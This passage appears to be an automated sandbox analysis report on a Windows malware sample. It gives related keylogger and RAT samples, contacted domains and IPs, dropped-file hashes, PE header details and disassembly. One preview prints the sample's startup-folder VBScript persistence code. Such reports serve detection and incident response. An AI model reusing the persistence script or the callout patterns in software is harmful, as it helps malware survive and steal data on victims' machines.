                                                                                                                Payment 01.08.25.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                December Reconciliation QuanKang.exeGet hashmaliciousUnknownBrowse
                                                                                                                • checkip.dyndns.org/

                                                                                                                Domains

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                mail.acadental.comNuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 3.130.71.34
                                                                                                                checkip.dyndns.comYJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 193.122.6.168
                                                                                                                xom6WSISuh.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                • 132.226.8.169
                                                                                                                AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 193.122.6.168
                                                                                                                eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 132.226.247.73
                                                                                                                MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 158.101.44.242
                                                                                                                3WgNXsWvMO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 132.226.8.169
                                                                                                                SBkuP3ACSA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • 193.122.6.168
                                                                                                                v3tK92KcJV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • 132.226.247.73
                                                                                                                r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 132.226.8.169
                                                                                                                RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 158.101.44.242
                                                                                                                reallyfreegeoip.orgYJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.112.1
                                                                                                                xom6WSISuh.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                • 104.21.112.1
                                                                                                                AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.64.1
                                                                                                                eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 104.21.64.1
                                                                                                                MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 104.21.96.1
                                                                                                                3WgNXsWvMO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 104.21.80.1
                                                                                                                SBkuP3ACSA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • 104.21.16.1
                                                                                                                v3tK92KcJV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • 104.21.16.1
                                                                                                                r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.80.1
                                                                                                                RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 104.21.80.1
                                                                                                                api.telegram.org6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 149.154.167.220
                                                                                                                MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 149.154.167.220
                                                                                                                r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                IUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 149.154.167.220
                                                                                                                8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                B7N48hmO78.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220

                                                                                                                ASNs

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                TELEGRAMRU6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 149.154.167.220
                                                                                                                MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 149.154.167.220
                                                                                                                r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                IUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 149.154.167.220
                                                                                                                8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                                                • 149.154.167.99
                                                                                                                CLOUDFLARENETUS6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                • 172.67.196.114
                                                                                                                Voicemail_+Transcription+_ATT006151.docxGet hashmaliciousUnknownBrowse
                                                                                                                • 104.17.25.14
                                                                                                                YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.112.1
                                                                                                                Y8Q1voljvb.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 104.26.12.205
                                                                                                                ofZiNLLKZU.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 104.21.28.65
                                                                                                                xom6WSISuh.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                • 104.21.112.1
                                                                                                                3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 104.21.48.233
                                                                                                                https://www.mentimeter.com/app/presentation/alp52o7zih4ubnvbqe9pvb585a1z3bd7/edit?source=share-modalGet hashmaliciousUnknownBrowse
                                                                                                                • 104.17.25.14
                                                                                                                AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.64.1
                                                                                                                eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 104.21.64.1
                                                                                                                AMAZON-02US3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 13.248.169.48
                                                                                                                https://www.mentimeter.com/app/presentation/alp52o7zih4ubnvbqe9pvb585a1z3bd7/edit?source=share-modalGet hashmaliciousUnknownBrowse
                                                                                                                • 108.138.26.78
                                                                                                                FG5wHs4fVX.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 18.143.155.63
                                                                                                                KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 13.228.81.39
                                                                                                                https://www.depoqq.win/genoGet hashmaliciousUnknownBrowse
                                                                                                                • 34.250.141.206
                                                                                                                phish_alert_sp2_2.0.0.0 (1).emlGet hashmaliciousUnknownBrowse
                                                                                                                • 108.138.26.51
                                                                                                                smQoKNkwB7.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 18.143.155.63
                                                                                                                https://www.shinsengumiusa.com/mrloskieGet hashmaliciousUnknownBrowse
                                                                                                                • 3.120.85.61
                                                                                                                http://infarmbureau.comGet hashmaliciousUnknownBrowse
                                                                                                                • 3.131.211.191
                                                                                                                https://cjerichmond.jimdosite.com/Get hashmaliciousUnknownBrowse
                                                                                                                • 3.255.10.234

                                                                                                                JA3 Fingerprints

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                54328bd36c14bd82ddaa0c04b25ed9adYJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.16.1
                                                                                                                xom6WSISuh.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                • 104.21.16.1
                                                                                                                AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.16.1
                                                                                                                eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 104.21.16.1
                                                                                                                MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 104.21.16.1
                                                                                                                3WgNXsWvMO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 104.21.16.1
                                                                                                                SBkuP3ACSA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • 104.21.16.1
                                                                                                                v3tK92KcJV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • 104.21.16.1
                                                                                                                r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.16.1
                                                                                                                RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 104.21.16.1
                                                                                                                3b5074b1b5d032e5620f69f9f700ff0eMqzEQCpFAY.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 149.154.167.220
                                                                                                                6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                Y8Q1voljvb.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 149.154.167.220
                                                                                                                MWP0FO5rAF.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 149.154.167.220
                                                                                                                MWP0FO5rAF.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 149.154.167.220
                                                                                                                AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 149.154.167.220
                                                                                                                grW5hyK960.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 149.154.167.220
                                                                                                                MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 149.154.167.220

                                                                                                                Dropped Files

                                                                                                                No context

                                                                                                                Created / dropped Files

                                                                                                                C:\Users\user\AppData\Local\Hegeleos\spadixes.exe

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\RubzLi27lr.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1094656
                                                                                                                Entropy (8bit):6.936211076561911
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:0qDEvCTbMWu7rQYlBQcBiT6rprG8aDHikw:0TvC/MTQYxsWR7aDHik
                                                                                                                MD5:44F0EA32A5ACF017ACF1D2A595C615F1
                                                                                                                SHA1:EF36981F3271CF8C1A4B16A86B3D5F232337BB93
                                                                                                                SHA-256:EADCB6EA284444FDF72E7FA141BE4A0D9D61D5BDD95BDB353E12C507915DE1F8
                                                                                                                SHA-512:B922AFCAFEFD047E319DC2B4806BD9846B4B4B482EE17CB200AB581D2CCF35138CD0E264ACE05D6A284B3D1CF176F9EBD886C45E2A7E3F58E6F34B8B6C614E2C
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                Reputation:low
                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...u.ag..........".................w.............@.......................................@...@.......@.....................d...|....@...I.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....I...@...J..................@..@.reloc...u.......v...>..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                C:\Users\user\AppData\Local\Temp\aut14A5.tmp

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\AppData\Local\Hegeleos\spadixes.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):115588
                                                                                                                Entropy (8bit):7.799477513269117
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:H5CLsA4a9Psci4Q7xubODnseF24eTFqmD:Q9Pst4iMeseYLD
                                                                                                                MD5:DB2AD08692705AAD98009A1D300B468A
                                                                                                                SHA1:428842A4C7AE9763D70DFA54811C6C74ADA41727
                                                                                                                SHA-256:11B7C600E48017E243712E1E51F8ADC8ACB4742BAF5C815A04A987CF4073A2AF
                                                                                                                SHA-512:03881A3804DB80E09255376853D5512B2D7F3C34458104C052617E6E49F95CE1B61E53091BF56BC220A4FD196C42B3A35D70388ADEC9542879FDBAA8F92002F7
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:EA06..<....t..N.G..)..*mF.Tit.......).Y....!........+...g...l....K.2+\.<..f..d.S[.Jd..L.'!..n.....z....|.;^..n ...E)t..J.G.u{....t.uJ5z...R"s*5B...\R.L.E@...<.@.Q....o6.U.$3Q........Pb.5.p....*gC..k..D....0..."T.U..A.R)..(...... .P....@P..;].. .....%3I...t..X.0...H...=h......qP..(T..... P....H......{.S ...j..... *@..>d...B&.h .....Pj.x...3.A>..U/.W......m@.}i4.X....m....]&....1P..f.Z.<..R..........u..+.....6. .\.@......... W......i.;..gS.[nu.u..5.S*..,.#S.Sz..e2.F....]"gS.M...7"l.@H...g.C..)..p...R.S{.2.V.V.T...Si....:...S.S*.(..x...S....U..4..z....:...z.O."..$.@I..,.2.H.....8.A....D.;F.\.`...U.[.TY..{..j...n.U.Y..i...z.."2....g.X.sN5~.K.Fn2....g.G.......,.......[.R..*gW....).`..../v....V.......CT...E...F.a..i.^. ....-.*...%.....2.N..@H...gS.Q...d..@T.....m..&P...q...)....E.R(..uB.A.h.i...L.P...5B.K.[juK~....M.H..1......<..C.....G...Jt.....#v....z.O.(.B`...(.}uf.H..(.9d....P.. ..yF.k....N.E.Ky.*..q...).p...Z..@,...H.K. *.......7Z.....0#...

                                                                                                                C:\Users\user\AppData\Local\Temp\autC9B1.tmp

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\RubzLi27lr.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):115588
                                                                                                                Entropy (8bit):7.799477513269117
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:H5CLsA4a9Psci4Q7xubODnseF24eTFqmD:Q9Pst4iMeseYLD
                                                                                                                MD5:DB2AD08692705AAD98009A1D300B468A
                                                                                                                SHA1:428842A4C7AE9763D70DFA54811C6C74ADA41727
                                                                                                                SHA-256:11B7C600E48017E243712E1E51F8ADC8ACB4742BAF5C815A04A987CF4073A2AF
                                                                                                                SHA-512:03881A3804DB80E09255376853D5512B2D7F3C34458104C052617E6E49F95CE1B61E53091BF56BC220A4FD196C42B3A35D70388ADEC9542879FDBAA8F92002F7
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:EA06..<....t..N.G..)..*mF.Tit.......).Y....!........+...g...l....K.2+\.<..f..d.S[.Jd..L.'!..n.....z....|.;^..n ...E)t..J.G.u{....t.uJ5z...R"s*5B...\R.L.E@...<.@.Q....o6.U.$3Q........Pb.5.p....*gC..k..D....0..."T.U..A.R)..(...... .P....@P..;].. .....%3I...t..X.0...H...=h......qP..(T..... P....H......{.S ...j..... *@..>d...B&.h .....Pj.x...3.A>..U/.W......m@.}i4.X....m....]&....1P..f.Z.<..R..........u..+.....6. .\.@......... W......i.;..gS.[nu.u..5.S*..,.#S.Sz..e2.F....]"gS.M...7"l.@H...g.C..)..p...R.S{.2.V.V.T...Si....:...S.S*.(..x...S....U..4..z....:...z.O."..$.@I..,.2.H.....8.A....D.;F.\.`...U.[.TY..{..j...n.U.Y..i...z.."2....g.X.sN5~.K.Fn2....g.G.......,.......[.R..*gW....).`..../v....V.......CT...E...F.a..i.^. ....-.*...%.....2.N..@H...gS.Q...d..@T.....m..&P...q...)....E.R(..uB.A.h.i...L.P...5B.K.[juK~....M.H..1......<..C.....G...Jt.....#v....z.O.(.B`...(.}uf.H..(.9d....P.. ..yF.k....N.E.Ky.*..q...).p...Z..@,...H.K. *.......7Z.....0#...

                                                                                                                C:\Users\user\AppData\Local\Temp\autD615.tmp

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\AppData\Local\Hegeleos\spadixes.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):115588
                                                                                                                Entropy (8bit):7.799477513269117
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:H5CLsA4a9Psci4Q7xubODnseF24eTFqmD:Q9Pst4iMeseYLD
                                                                                                                MD5:DB2AD08692705AAD98009A1D300B468A
                                                                                                                SHA1:428842A4C7AE9763D70DFA54811C6C74ADA41727
                                                                                                                SHA-256:11B7C600E48017E243712E1E51F8ADC8ACB4742BAF5C815A04A987CF4073A2AF
                                                                                                                SHA-512:03881A3804DB80E09255376853D5512B2D7F3C34458104C052617E6E49F95CE1B61E53091BF56BC220A4FD196C42B3A35D70388ADEC9542879FDBAA8F92002F7
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:EA06..<....t..N.G..)..*mF.Tit.......).Y....!........+...g...l....K.2+\.<..f..d.S[.Jd..L.'!..n.....z....|.;^..n ...E)t..J.G.u{....t.uJ5z...R"s*5B...\R.L.E@...<.@.Q....o6.U.$3Q........Pb.5.p....*gC..k..D....0..."T.U..A.R)..(...... .P....@P..;].. .....%3I...t..X.0...H...=h......qP..(T..... P....H......{.S ...j..... *@..>d...B&.h .....Pj.x...3.A>..U/.W......m@.}i4.X....m....]&....1P..f.Z.<..R..........u..+.....6. .\.@......... W......i.;..gS.[nu.u..5.S*..,.#S.Sz..e2.F....]"gS.M...7"l.@H...g.C..)..p...R.S{.2.V.V.T...Si....:...S.S*.(..x...S....U..4..z....:...z.O."..$.@I..,.2.H.....8.A....D.;F.\.`...U.[.TY..{..j...n.U.Y..i...z.."2....g.X.sN5~.K.Fn2....g.G.......,.......[.R..*gW....).`..../v....V.......CT...E...F.a..i.^. ....-.*...%.....2.N..@H...gS.Q...d..@T.....m..&P...q...)....E.R(..uB.A.h.i...L.P...5B.K.[juK~....M.H..1......<..C.....G...Jt.....#v....z.O.(.B`...(.}uf.H..(.9d....P.. ..yF.k....N.E.Ky.*..q...).p...Z..@,...H.K. *.......7Z.....0#...

                                                                                                                C:\Users\user\AppData\Local\Temp\peristeronic

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\RubzLi27lr.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):277504
                                                                                                                Entropy (8bit):6.8913047797206675
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:bP4T1x0kGFLL2vQM7WFt8hw3C2SiG/Awhz8QbSKbvBqgG:T4Tz0ks2vQM7WFt8hw3C2SiG/Awhz8Qs
                                                                                                                MD5:A9D44D9128C6E075588C676B7933C7E8
                                                                                                                SHA1:97C144BC7E81433A97E6DFF111403E5C2D1A0B24
                                                                                                                SHA-256:75D6FEB3628D88E8321C78AE0872AE122ADFC0E22E722EA10EB8546063C407DA
                                                                                                                SHA-512:31EA131FBFA5A7904A9C6BD83DF28DE8A547FD7E8372F408A88669FFC9AEDA7F3A5239D7A5F87DD2EBFCF99F5F83DC5E82A610ACAFFB786711E083653DD8625E
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:...J0SVGQPLL..6F.QKJ3SVG.PLLH56FPQKJ3SVGUPLLH56FPQKJ3SVGUPLL.56F^N.D3._.t.M...b.9"k:A<154=l/)[X)$q)/.!#)u9"l.zef=>//.^[MqPLLH56F..KJ.RUG...*H56FPQKJ.STF^Q.LH.2FPEKJ3SVGK.HLH.6FP1OJ3S.GUpLLH76FTQKJ3SVGQPLLH56FP.OJ3QVGUPLLJ5v.PQ[J3CVGUP\LH%6FPQKJ#SVGUPLLH56F..OJ|SVGU0HL_%6FPQKJ3SVGUPLLH56FP.OJ?SVGUPLLH56FPQKJ3SVGUPLLH56FPQKJ3SVGUPLLH56FPQKJ3SVGUpLL@56FPQKJ3SVG]pLL.56FPQKJ3SVG{$)4<56FtuOJ3sVGUvHLH76FPQKJ3SVGUPLLh56&~#88PSVGB@LLHU2FPCKJ3{RGUPLLH56FPQKJsSV.{") 'V6F\QKJ3.RGURLLH.2FPQKJ3SVGUPLL.56.PQKJ3SVGUPLLH56FP.OJ3SVG.PLLJ53F..IJK.WGVPLL.56@..IJ.SVGUPLLH56FPQKJ3SVGUPLLH56FPQKJ3SVGUPLLH56F.,.E...&..LH56FPPII7U^OUPLLH56F.QKJuSVG.PLL.56FuQKJ^SVGqPLL656F.QKJWSVG'PLL)56F.QKJ\SVG;PLL656FNScj3S\msPNdi56LP{.9.SVM.QLLLF.FP[.H3SR4qPLF.66FT"nJ3Y.CUPH?n56L.TKJ7y.GV.ZJH5-)iQK@3P.RSPLWb.6DxkKJ9S|aUS.YN56]zsKH.ZVGQz.?U56@x.KJ9'_GUR.FH52lNSc.3S\mw.GLH1.Fzs5F3SRlUzn2E56B{QaT1.[GUTfn6;6FTzK`.-YGUTgLb+4._QKN.q(WUPHgH..8AQKN.S|e+BLLL.6lr/XJ3W}G.r2XH52mP{i4&SVC~Pfn6#6FTzK`.-AGUTgLb.H^PQOa3yHE.HLLL.0l2Q9j%S&D

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\AppData\Local\Hegeleos\spadixes.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):280
                                                                                                                Entropy (8bit):3.385617488462878
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:DMM8lfm3OOQdUfclzXUEZ+lX1qlVpFA36nriIM8lfQVn:DsO+vNlDQ1qnc4mA2n
                                                                                                                MD5:92CE8022D40F4AE1D1FD16F8941AB18E
                                                                                                                SHA1:B7709C520B79750E52B0ADABBA4C79A378F12954
                                                                                                                SHA-256:B832983EA36004CD8C722EA1EFFCD6415F6525FC8A7E77462DA76EB4A3EC1775
                                                                                                                SHA-512:86E5D7C1090195B6E56788FE2DF9262020132BCFF8C8F68ED7ACC111C4A06B7BE51D7904A6AA74C60D01004E5E2354EE755326B0D1402B33FD8DF78195FA3196
                                                                                                                Malicious:true
                                                                                                                Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.H.e.g.e.l.e.o.s.\.s.p.a.d.i.x.e.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                                                                                                                Static File Info

                                                                                                                General

                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Entropy (8bit):6.936211076561911
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                File name:RubzLi27lr.exe
                                                                                                                File size:1'094'656 bytes
                                                                                                                MD5:44f0ea32a5acf017acf1d2a595c615f1
                                                                                                                SHA1:ef36981f3271cf8c1a4b16a86b3d5f232337bb93
                                                                                                                SHA256:eadcb6ea284444fdf72e7fa141be4a0d9d61d5bdd95bdb353e12c507915de1f8
                                                                                                                SHA512:b922afcafefd047e319dc2b4806bd9846b4b4b482ee17cb200ab581d2ccf35138cd0e264ace05d6a284b3d1cf176f9ebd886c45e2a7e3f58e6f34b8b6c614e2c
                                                                                                                SSDEEP:24576:0qDEvCTbMWu7rQYlBQcBiT6rprG8aDHikw:0TvC/MTQYxsWR7aDHik
                                                                                                                TLSH:B135BF0273D1C062FFAB92334B5AF6515BBC69260123E61F13981DB9BE701B1563E7A3
                                                                                                                File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                                                                                                File Icon

                                                                                                                Icon Hash:aaf3e3e3938382a0

                                                                                                                Static PE Info

                                                                                                                General

                                                                                                                Entrypoint:0x420577
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0x6761AC75 [Tue Dec 17 16:53:09 2024 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:5
                                                                                                                OS Version Minor:1
                                                                                                                File Version Major:5
                                                                                                                File Version Minor:1
                                                                                                                Subsystem Version Major:5
                                                                                                                Subsystem Version Minor:1
                                                                                                                Import Hash:948cc502fe9226992dce9417f952fce3

                                                                                                                Entrypoint Preview

                                                                                                                Instruction
                                                                                                                call 00007F7ABCB9B673h
                                                                                                                jmp 00007F7ABCB9AF7Fh
                                                                                                                push ebp
                                                                                                                mov ebp, esp
                                                                                                                push esi
                                                                                                                push dword ptr [ebp+08h]
                                                                                                                mov esi, ecx
                                                                                                                call 00007F7ABCB9B15Dh
                                                                                                                mov dword ptr [esi], 0049FDF0h
                                                                                                                mov eax, esi
                                                                                                                pop esi
                                                                                                                pop ebp
                                                                                                                retn 0004h
                                                                                                                and dword ptr [ecx+04h], 00000000h
                                                                                                                mov eax, ecx
                                                                                                                and dword ptr [ecx+08h], 00000000h
                                                                                                                mov dword ptr [ecx+04h], 0049FDF8h
                                                                                                                mov dword ptr [ecx], 0049FDF0h
                                                                                                                ret
                                                                                                                push ebp
                                                                                                                mov ebp, esp
                                                                                                                push esi
                                                                                                                push dword ptr [ebp+08h]
                                                                                                                mov esi, ecx
                                                                                                                call 00007F7ABCB9B12Ah
                                                                                                                mov dword ptr [esi], 0049FE0Ch
                                                                                                                mov eax, esi
                                                                                                                pop esi
                                                                                                                pop ebp
                                                                                                                retn 0004h
                                                                                                                and dword ptr [ecx+04h], 00000000h
                                                                                                                mov eax, ecx
                                                                                                                and dword ptr [ecx+08h], 00000000h
                                                                                                                mov dword ptr [ecx+04h], 0049FE14h
                                                                                                                mov dword ptr [ecx], 0049FE0Ch
                                                                                                                ret
                                                                                                                push ebp
                                                                                                                mov ebp, esp
                                                                                                                push esi
                                                                                                                mov esi, ecx
                                                                                                                lea eax, dword ptr [esi+04h]
                                                                                                                mov dword ptr [esi], 0049FDD0h
                                                                                                                and dword ptr [eax], 00000000h
                                                                                                                and dword ptr [eax+04h], 00000000h
                                                                                                                push eax
                                                                                                                mov eax, dword ptr [ebp+08h]
                                                                                                                add eax, 04h
                                                                                                                push eax
                                                                                                                call 00007F7ABCB9DD1Dh
                                                                                                                pop ecx
                                                                                                                pop ecx
                                                                                                                mov eax, esi
                                                                                                                pop esi
                                                                                                                pop ebp
                                                                                                                retn 0004h
                                                                                                                lea eax, dword ptr [ecx+04h]
                                                                                                                mov dword ptr [ecx], 0049FDD0h
                                                                                                                push eax
                                                                                                                call 00007F7ABCB9DD68h
                                                                                                                pop ecx
                                                                                                                ret
                                                                                                                push ebp
                                                                                                                mov ebp, esp
                                                                                                                push esi
                                                                                                                mov esi, ecx
                                                                                                                lea eax, dword ptr [esi+04h]
                                                                                                                mov dword ptr [esi], 0049FDD0h
                                                                                                                push eax
                                                                                                                call 00007F7ABCB9DD51h
                                                                                                                test byte ptr [ebp+08h], 00000001h
                                                                                                                pop ecx

                                                                                                                Rich Headers

                                                                                                                Programming Language:
                                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                                • [IMP] VS2008 SP1 build 30729

                                                                                                                Data Directories

                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x34900.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
